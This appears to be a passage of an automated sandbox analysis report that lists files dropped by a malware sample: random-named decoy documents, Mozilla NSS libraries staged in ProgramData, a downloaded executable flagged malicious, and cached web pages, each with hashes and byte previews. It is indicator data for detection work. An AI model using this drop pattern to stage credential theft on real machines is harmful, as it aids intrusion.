Preview:	NIRMEKAMZHIQPCHHYDLDLONNDCJFTRECXCDYNWSMACINEWVUDRAWELIDKGUGOSLGTIKNJSPGIFRTNFPWDBIHISPKHOBWBMPRCMOQQAVOUVQODKWHOMRFLDKYATGCKZVKRHTCMHJJGYWRTELTQOLJXKPKLCWLNKOQBPNOJHARBPHMNOZRAICCUCIEHOFBKAUBHQNVPQAWMIZZGYXPDVFFYAGVHCILYWHPIYXMHCXNZJBHOBSYJEJJTXWKIBAQBZGNDHAWRNDJBFGUEFMOHHHXTBQHMIBGPLFFGAEFCSIDIGIIDPUHNETSAWPCSJJCDZPMLCWGKVYJOMJWFUXHEQSIPJDTRUPSCBCTYFLTMLRFJUXIBNGXSREQTWHFPIDSKBRTLLRUTFDXFIDFUXMZCFABRMLSHWFSZTZUJRPKXKHBWYAPJLBFVPDCCGSQYVSJDWWNYUXGFFAMCEWZRCITRTQVISLFKGNMRYVUJTQWJUFSLPGOANDHPJXZJWSWQJJZLPACFDBTCFPQMXOVHIOAMCIQCTLIBSRXETYYSVLPHVURWFAJBQPHFKWZOFSUIKXWOHPOJGFCCQGRXFMTCKHSWJPWBLFTLVERFEAFHASTRMUQSDEUNXGDSWWTOQTUBAZVNLXDRFCZWKUVIGVXHTLERNSTFJCPGLHSIFYNUWMACSMFBHFDCZSOPZRKQGTETMPYNUQPOTCKDJQXQUUMEWVKVIEYDAEXLRTMQQSTAVCIBCOSHDMRFFHIAQDBBMBEOMTPGHKJIAYMKMTMXYUVORUJUGSHEHFCYZUALULRJGKXINMJWUWMPZOJOUMUEFFWCKOWNLIEVQWZPJMTQVIEDAFICXPPSUGBPZSMHDQOIXNDWLCSVZUHTSHAPPFDAEETYFLSNJFPXRPZYQLZLSJQALWIOEGAOFDHHNAOIWCTFHXKZJROQRTVBGVHJKRUCGBHKRLCZODATMBGLOISTFOETTXPJOPGPPJYNFXWQFALNGZLGZVJ

C:\ProgramData\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6998645060098685
Encrypted:	false
SSDEEP:	24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
MD5:	1676F91570425F6566A5746BC8E8427E
SHA1:	0F922133E2BEF0B48C623BEFA0C77361F6FA3900
SHA-256:	534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
SHA-512:	07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
Malicious:	false
Preview:	NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

C:\ProgramData\SQSJKEBWDT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3ABE.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\3ABE.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1022
Entropy (8bit):	5.252542495586483
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
MD5:	2F99BED9FF8C41AFEE96B028ED8B86A2
SHA1:	BF4E91361EE28C5506E812F2BF8C3495676097B0
SHA-256:	F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
SHA-512:	834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\LEF2XW79.htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (24599), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	367826
Entropy (8bit):	5.411426845176283
Encrypted:	false
SSDEEP:	3072:ASZsSfWF8jJMI7P6s4pD/pgSI+HK7soFgRtyc3Ik:ArI7P6nKix3H
MD5:	5E38BA242DCD3851C1034A798A0746BE
SHA1:	2C476B442717410C6A023D0CA9AA7EA04C8B069E
SHA-256:	C1F04C8AF5FFAD187BA1E08D4C03BB4EFDD4547ED769A2A06E270A87A193B2A3
SHA-512:	67333B197999F2CD15D933AEA66CCACE35874BCA6A18383EDB67CF7E5560B4197787F6A8C3C9732DBC652FCC6C68E081A4C7D502F39222319F7E128029577EB5
Malicious:	false
Preview:	<!DOCTYPE html><html lang="en" data-promo-id="cf92eff" data-domain="usa" data-no-gtm="false" data-no-maxymiser="false" data-no-omniture="false" dir="ltr"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><title data-react-helmet="true">Kaspersky Cyber Security Solutions for Home and Business \| Kaspersky</title><meta data-react-helmet="true" name="description" content="A Global Leader in Next Generation Cybersecurity Solutions and Services, Kaspersky Offers Premium Protection Against All Cyber Threats for Your Home and Business."/><meta data-react-helmet="true" name="DocId" content="/"/><meta data-react-helmet="true" name="DocType" content="Marketing-B2C"/><meta data-react-helmet="true" name="PublishDate" content="2023-12-24"/><meta data-react-helmet="true" name="PubLang" content="en"/><meta data-react-helmet="true" name="PubCountry" content="us"/><meta data-react-helmet="true" name="Breadcrumb" content=""/><meta d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\syncUpd[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	314368
Entropy (8bit):	6.870552913343331
Encrypted:	false
SSDEEP:	6144:7D/4YmwLDg2dB7Aqw92Ab6qmaHetSf2fnVtV:H/42nn1Aqw9rbhxeIefnPV
MD5:	14ECE4108FC25FE4D185C101714A25B3
SHA1:	DB4C0E63EF57DC148DC84FB8E7558B45A069FD0E
SHA-256:	E1DDC3BF0959A65F141DA91C8D9A5F5550E9C72A19A9F958C21A490DC4A731B0
SHA-512:	D857DEEE4890E69CDAC3D1BBAABFE7791784B872B3ACF807EEF07856B0D4303D586902EF1D1CC8D5A53DF626097791A9831F96DB9B6C53B02826EE54AF73F9F5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L.....Kd.................>..........j........P....@...........................".............................................L}..P....... $...........................................................................P...............................text...&<.......>.................. ..`.rdata...9...P...:...B..............@..@.data....g.......&...\|..............@....nuz....A...........................@....rsrc... ........&..................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\BOVROVJK.htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1397)
Category:	dropped
Size (bytes):	58036
Entropy (8bit):	4.958527635367317
Encrypted:	false
SSDEEP:	768:eRHAtJ3vYpv73dOLrW5nZ7i9vLr843ovTp:eRHAj3vYpj3sLruZ7ilr8434Tp
MD5:	EFA45A416214D897534933B2DD2F55A1
SHA1:	844B89572396C5001C437F83E29FED7AF186D48F
SHA-256:	EC1F60980F220D5CEBB6779D87EDCE07B00B446A307C87D46C30FD6137E6507E
SHA-512:	DB64FB06A2B5E1AAA372192F7F71C0EA11E9321F7D5474F0C404376F3E8BC8183ECAE17CB193E1AB6293F5637FACF578896A7CFAC3AF42C6D9E1EB46CE5236AE
Malicious:	false
Preview:	<!doctype html>..<html lang="en" dir="ltr">.<head>..<script type="text/javascript"> (function (){ var unescape = function unescapeHtmlEntitiesDeepLite(r){if("function"!=typeof Array.isArray\|\|"function"!=typeof Array.prototype.forEach\|\|"function"!=typeof Array.prototype.map\|\|"function"!=typeof Object.keys)throw Error("Unsupported browser: Missing support for `Array.isArray`, `Array.prototype.forEach`, `Array.prototype.map`, or `Object.keys`! (Sails' built-in HTML-unescaping for exposed locals supports IE9 and up.)");return function t(r){if(null===r)return r;if(r===!0\|\|r===!1)return r;if("number"==typeof r)return r;if("string"==typeof r){var e=/&(?:amp\|lt\|gt\|quot\|#39\|#96);/g,o=RegExp(e.source);if(""===r)return r;if(o.test(r)){var n={"&":"&","<":"<",">":">",""":'"',"'":"'","`":"`"};return r=r.replace(e,function(r){return n[r]})}return r}return Array.isArray(r)?r=r.map(function(r){return t(r)}):(Object.keys(r).forEach(function(e){r[e]=t(r[e],e)}),r)}(r)}; window.SA

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\plus[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\I8VE1PYP.htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	233
Entropy (8bit):	5.097437238923001
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPic4i9KmGd+KqD:J0+ox0RJWWPN9FGIT
MD5:	484B1529A803141CC1C5A217C5C17391
SHA1:	5B1D11CBE92B50A9278177ED3116638DADA43712
SHA-256:	255B4FD0A69DE10E5A85DBBBC3BF95F3936F79CAA87E34D1CE0E02E7D2734BF6
SHA-512:	8F6AC48EE517E9EF8C8BE0F2CCC3011077B7A9478380038EA0256627CDC29B79B3499654B6B96BEB79582E73980AA00BBA237A1CF64522679B3CA64019749310
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://www.zonealarm.com/">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
